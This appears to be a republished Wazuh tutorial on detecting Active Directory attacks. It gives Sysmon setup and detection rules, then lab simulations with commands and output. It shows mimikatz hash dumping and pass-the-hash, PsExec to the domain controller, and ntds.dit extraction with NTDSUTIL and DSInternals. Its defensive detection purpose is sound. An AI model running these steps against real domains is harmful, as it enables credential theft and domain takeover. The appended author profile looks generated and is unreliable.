How to detect Active Directory attacks with Wazuh [Part 2] | Wazuh (2023)

Active Directory (AD) is the most widely used Identity and Access Management (IAM) technology for Windows domain networks in modern organizations. It is adopted by small, medium, and large enterprises to manage enterprise networks, so it is an ideal target for attackers. AD is a perfect target for attackers because many system administrators use it to manage enterprise networks.

To defend against threats, organizations need to implement the principle of defense in depth. Implementing several layers of defense mechanisms ensures that when the initial line of defense fails and hackers get access to Active Directory, the consequences are limited and contained.

In this blog post, we demonstrate how to simulate and detect the following AD attacks:

  • Pass the hash (PtH) attacks
  • Ntds.dit password extraction

Active Directory attacks: Infrastructure setup

We use the following setup to simulate AD attacks and show how Wazuh can detect them:

  • A Centos 7 endpoint with Wazuh 4.3.10 installed. You can install the Wazuh central components using this Quickstart installation guide.
  • A Windows Server 2022 domain controller running the Wazuh agent 4.3.10. This domain controller hosts the Active Directory infrastructure. You can use this Wazuh guide to install the Wazuh agent. In this blogpost, we use the domain names Windows10 and
  • A Windows 10 Pro or Enterprise edition endpoint running Wazuh agent 4.3.10. The Windows 10 endpoint is registered to the Active Directory and serves as the attacker’s initial foothold after compromise.
  • A domain account on the Active Directory with local administrative privilege on the compromised Windows 10 endpoint. This account is the compromised user account used to simulate our attacks.
  • A domain administrator account on the Active Directory is required to serve as the target of the pass the hash attack.
  • A Mimikatz copy in the compromised Windows 10 endpoint. To run the mimikatz.exe, you can navigate to the mimikatz_trunk/x64 (or x32, depending on your system architecture). Mimikatz is required to perform the attack simulations.

Detection rules

To detect AD attacks, we create rules on the Wazuh server to detect IoCs in Windows security events and system events monitored by Sysmon.

Sysmon integration

1. Download Sysmon from the Microsoft Sysinternals page with the configuration file sysmonconfig.xml on the Windows 2022 domain controller and the compromised Windows 10 endpoint.

2. Run the following command to install Sysmon with the downloaded configuration file via PowerShell (run as administrator):

.\sysmon.exe -accepteula -i sysmonconfig.xml

3. Configure both Wazuh agents to collect Sysmon events by adding the following settings to the agent configuration file in "C:\Program Files (x86)\ossec-agent\ossec.conf":

<ossec_config> <localfile> <location>Microsoft-Windows-Sysmon/Operational</location> <log_format>eventchannel</log_format> </localfile></ossec_config>

4. Apply the changes by restarting the agents using this PowerShell command:

Restart-Service -Name wazuh

Wazuh server configuration

1. To generate alerts on the Wazuh dashboard whenever an attacker performs any of the attacks mentioned above, add the following rules to the /var/ossec/etc/rules/local_rules.xml file on the Wazuh server:

<group name="security_event, windows,"> <!-- This rule detects when PsExec is launched remotely to perform lateral movement within the domain. The rule uses Sysmon events collected from the domain controller. --> <rule id="110004" level="12"> <if_sid>61600</if_sid> <field name="win.system.eventID" type="pcre2">17|18</field> <field name="win.eventdata.PipeName" type="pcre2">\\PSEXESVC</field> <options>no_full_log</options> <description>PsExec service launched for possible lateral movement within the domain</description> </rule> <!-- This rule detects NTDS.dit file extraction using a sysmon event captured on the domain controller --> <rule id="110006" level="12"> <if_group>sysmon_event1</if_group> <field name="win.eventdata.commandLine" type="pcre2">NTDSUTIL</field> <description>Possible NTDS.dit file extraction using ntdsutil.exe</description> </rule> <!-- This rule detects Pass-the-ash (PtH) attacks using windows security event 4624 on the compromised endpoint --> <rule id="110007" level="12"> <if_sid>60103</if_sid> <field name="win.system.eventID">^4624$</field> <field name="win.eventdata.LogonProcessName" type="pcre2">seclogo</field> <field name="win.eventdata.LogonType" type="pcre2">9</field> <field name="win.eventdata.AuthenticationPackageName" type="pcre2">Negotiate</field> <field name="win.eventdata.LogonGuid" type="pcre2">{00000000-0000-0000-0000-000000000000}</field> <options>no_full_log</options> <description>Possible Pass the hash attack</description> </rule> <!-- This rule detects credential dumping when the command sekurlsa::logonpasswords is run on mimikatz --> <rule id="110008" level="12"> <if_sid>61612</if_sid> <field name="win.eventdata.TargetImage" type="pcre2">(?i)\\\\system32\\\\lsass.exe</field> <field name="win.eventdata.GrantedAccess" type="pcre2">(?i)0x1010</field> <description>Possible credential dumping using mimikatz</description> </rule> </group>

2. Restart the Wazuh server to apply the configuration changes:

systemctl restart wazuh-manager

Active Directory attacks simulation

In this section, we show how to simulate some common active directory attacks, as mentioned earlier. To successfully simulate the attacks, the attacker compromises a user account with local administrator privileges on the Windows 10 endpoint.


The <USERNAME> variable represents the compromised user account name on the active directory, which you use to simulate attacks.

Pass the hash attack simulation

Pass the Hash is a technique used by threat actors to steal credentials and perform lateral movement. This attack exploits the NTLM authentication protocol to authenticate a user with a password hash captured rather than using the account plaintext password.

1. Download PsTools to the compromised Windows 10 endpoint to demonstrate this attack.

2. Run PowerShell as administrator and change the current directory to the PsTools directory. Then run the .\PsExec.exe \\ cmd command to connect to the domain controller and execute commands remotely. Replace with your own Windows server name. After running the command, access is denied because the current user does not have the required privilege to perform this operation.

C:\Windows\system32>cd C:\Users\<USERNAME>\Desktop\PSToolsC:\Users\<USERNAME>\Desktop\PSTools>.\PsExec.exe \\ cmdPsExec v2.4 - Execute processes remotelyCopyright (C) 2001-2022 Mark RussinovichSysinternals - www.sysinternals.comCouldn't access is denied.C:\Users\<USERNAME>\Desktop\PSTools>

3. Open mimikatz as an administrator, then run the log passthehash.log and privilege::debug commands. The log passthehash.log enables logging of all the activities performed while the privilege::debug command grants the mimikatz process debug right by elevating privilege.

mimikatz # log passthehash.logUsing 'passthehash.log' for logfile : OKmimikatz # privilege::debugPrivilege '20' OK

4. Run sekurlsa::logonpasswords to extract password hashes from the LSASS.exe process memory, which stores the hashes for users with active sessions to the computer. The goal of this command is to obtain a user account with the relevant privileges to achieve the objective of the attack. We are looking for a user account with domain administrator privileges in this scenario.

mimikatz #sekurlsa::logonpasswords

We can see the NTLM hash of the user john is 812792a1f13bb10964ed1dfeac78c64b.

Authentication Id : 0 ; 4062248 (00000000:003dfc28)Session : RemoteInterActive from 5User Name : johnDomain : WAZUHTESTLogon Server : Windows2022DCLogon Time : 12/2/2022 1:42:19 PMSID : S-1-5-21-1860018313-2454207738-2274937249-1110 msv : [00000003] Primary * Username : john * Domain : WAZUHTEST * NTLM : 812792a1f13bb10964ed1dfeac78c64b * SHA1 : c109a02ac8caedb1b51f951b16ee024fe8bc6cd6 * DPAPI : 6d070f2e7b484db3aad54d6e17c5f8eb tspkg : wdigest : * Username : john * Domain : WAZUHTEST * Password : (null) kerberos : * Username : john * Domain : WAZUHTEST.COM * Password : (null) ssp : credman :—---------------------------------------------------

5. Run the following command to authenticate as the compromised user. In this scenario, the NTLM hash of user John, a domain administrator on the Active Directory, is used to perform the attack. A command prompt session immediately opens after running the command.

mimikatz # sekurlsa::pth /user:John / /ntlm:812792a1f13bb10964ed1dfeac78c64b
user : Johndomain : wazuhtest.comprogram : cmd.exeimpers. : noNTLM : 812792a1f13bb10964ed1dfeac78c64b | PID 396 | TID 88 | LSA Process is now R/W | LUID 0 ; 3971637 (00000000:003c9a35) \_ msv1_0 - data copy @ 0000013C12D90890 : OK ! \_ kerberos - data copy @ 0000013C139ED498 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 0000013C1398D148 (32) -> nullMicrosoft Windows [Version 10.0.14393](c) 2016 Microsoft Corporation. All rights reserved.

6. Change the current Directory to the PsTools Directory and run the .\PsExec.exe \\ cmd command to connect to the domain controller and execute commands remotely. After running the command, the connection was successful, and the session was authenticated with the credential of John, a domain administrator on the Active Directory.

C:\Windows\system32>cd C:\Users\<USERNAME>\Desktop\PSToolsC:\Users\<USERNAME>\Desktop\PSTools>.\PsExec.exe \\ cmd
PsExec v2.4 - Execute processes remotelyCopyright (C) 2001-2022 Mark RussinovichSysinternals - www.sysinternals.comMicrosoft Windows [Version 10.0.20348.1249](c) Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamiwazuhtest\johnC:\Windows\system32>

Run whoami and hostname commands to verify the current session is authenticated as John, and the current file system is the domain controller.

C:\Windows\system32>whoamiwazuhtest\johnC:\Windows\system32>whoami /groupsGROUP INFORMATION-----------------Group Name Type SID Attributes================================================ ================ ============================================= ===============================================================C:\Windows\system32>HostnameWindows2022DC

Ntds.dit password extraction simulation

The ntds.dit file located in C:\Windows\NTDS\ is the database that stores all the data in the Active Directory on every domain controller. Attackers can compromise users’ credentials by extracting the password hash from the ntds.dit file. This attack can be achieved by using several techniques to copy the ntds.dit file from the DC to a local system to crack the password offline.

An attacker needs access to the domain controller file system to extract ntds.dit file, hence this attack scenario will leverage the access obtained during pass the hash attack.

C:\Windows\system32>cd C:\Users\<USERNAME>\Desktop\PSToolsC:\Users\<USERNAME>\Desktop\PSTools>.\PsExec.exe \\ cmdPsExec v2.4 - Execute processes remotelyCopyright (C) 2001-2022 Mark RussinovichSysinternals - www.sysinternals.comMicrosoft Windows [Version 10.0.20348.1249](c) Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamiwazuhtest\john

1. Run the following command to exfiltrate ntds.dit file. The command also extracts the HKEY_LOCAL_MACHINE\SYSTEM and HKEY_LOCAL_MACHINE\SECURITY used for obtaining the Boot key that is required to decrypt the ntds.dit.

C:\Windows\system32>NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full C:\Files" "q" "q"
NTDSUTIL: Activate Instance NTDSActive instance set to "NTDS".NTDSUTIL: IFMifm: Create Full C:\FilesCreating snapshot...Snapshot set {811ff72d-e402-4b26-b437-b002f67cc4a9} generated successfully.Snapshot {d40c58d9-1510-4964-a640-f26444ee6ccd} mounted as C:\$SNAP_202212021554_VOLUMEC$\Snapshot {d40c58d9-1510-4964-a640-f26444ee6ccd} is already mounted.Initiating DEFRAGMENTATION mode... Source Database: C:\$SNAP_202212021554_VOLUMEC$\Windows\NTDS\ntds.dit Target Database: C:\Files\Active Directory\ntds.dit Defragmentation Status (complete) 0 10 20 30 40 50 60 70 80 90 100 |----|----|----|----|----|----|----|----|----|----| ...................................................Copying registry files...Copying C:\Files\registry\SYSTEMCopying C:\Files\registry\SECURITYSnapshot {d40c58d9-1510-4964-a640-f26444ee6ccd} unmounted.IFM media created successfully in C:\Filesifm: qNTDSUTIL: q

2. Open PowerShell on the command prompt and run the following command replacing it with the path of the extracted HKEY_LOCAL_MACHINE\SYSTEM registry key. You can install DSInternals PowerShell Module to ensure the command executes without error.

C:\Windows\system32>powershellPS C:\Windows\system32> $Key = Get-BootKey -SystemHiveFilePath C:\Files\registry\SYSTEM

3. Run the following command to extract password hashes from the ntds.dit file.

PS C:\Windows\system32> Get-ADDBAccount -All -Bootkey $key -DBPath 'C:\Files\Active Directory\ntds.dit'

We can see that, for example, the NTLM hash of the Administrator account is ef7638b237b9261793d27533b7dc701e:

e-DAcut-l-oky$e DPt :FlsAtvDrcoynd.iDistinguishedName: CN=Administrator,CN=Users,DC=wazuhtest,DC=comSid: S-1-5-21-1860018313-2454207738-2274937249-500Guid: d5feab09-3399-4318-87d8-9e2e99d224bdSamAccountName: AdministratorSamAccountType: UserUserPrincipalName:PrimaryGroupId: 513SidHistory:Enabled: TrueUserAccountControl: NormalAccountSupportedEncryptionTypes:AdminCount: TrueDeleted: FalseLastLogonDate: 12/2/2022 10:31:21 AMDisplayName:GivenName:Surname:Description: Built-in account for administering the computer/domainServicePrincipalName:SecurityDescriptor: DiscretionaryAclPresent, SystemAclPresent, DiscretionaryAclAutoInherited, SystemAclAutoInherited,DiscretionaryAclProtected, SelfRelativeOwner: S-1-5-21-1860018313-2454207738-2274937249-512Secrets NTHash: ef7638b237b9261793d27533b7dc701e LMHash: NTHashHistory: LMHashHistory: SupplementalCredentials: ClearText: NTLMStrongHash: 4608ad862cac4b7e5cef0730972b70ad Kerberos:

Detection result

After simulating the attacks, the alerts are generated on the Wazuh dashboard based on the events from the Windows 2022 domain controller.

How to detect Active Directory attacks with Wazuh [Part 2] | Wazuh (1)

After simulating pass the hash attack, the alerts are generated on the Wazuh dashboard based on events from the compromised Windows 10 endpoint.

How to detect Active Directory attacks with Wazuh [Part 2] | Wazuh (2)


Active Directory is a core component that facilitates the centralized administration of identities and resources in any organization. It has become a target for most attackers due to its wide adoption and uses. Hence, it is necessary to detect and defend against these attacks. It is essential to detect early indications of lateral movement and privilege escalation as it aids in preventing attacks.

This blog shows how Wazuh can detect some common Active Directory attacks using Windows security logs and events captured on Sysmon.

Top Articles
Latest Posts
Article information

Author: Ms. Lucile Johns

Last Updated: 02/26/2023

Views: 6177

Rating: 4 / 5 (61 voted)

Reviews: 84% of readers found this page helpful

Author information

Name: Ms. Lucile Johns

Birthday: 1999-11-16

Address: Suite 237 56046 Walsh Coves, West Enid, VT 46557

Phone: +59115435987187

Job: Education Supervisor

Hobby: Genealogy, Stone skipping, Skydiving, Nordic skating, Couponing, Coloring, Gardening

Introduction: My name is Ms. Lucile Johns, I am a successful, friendly, friendly, homely, adventurous, handsome, delightful person who loves writing and wants to share my knowledge and understanding with you.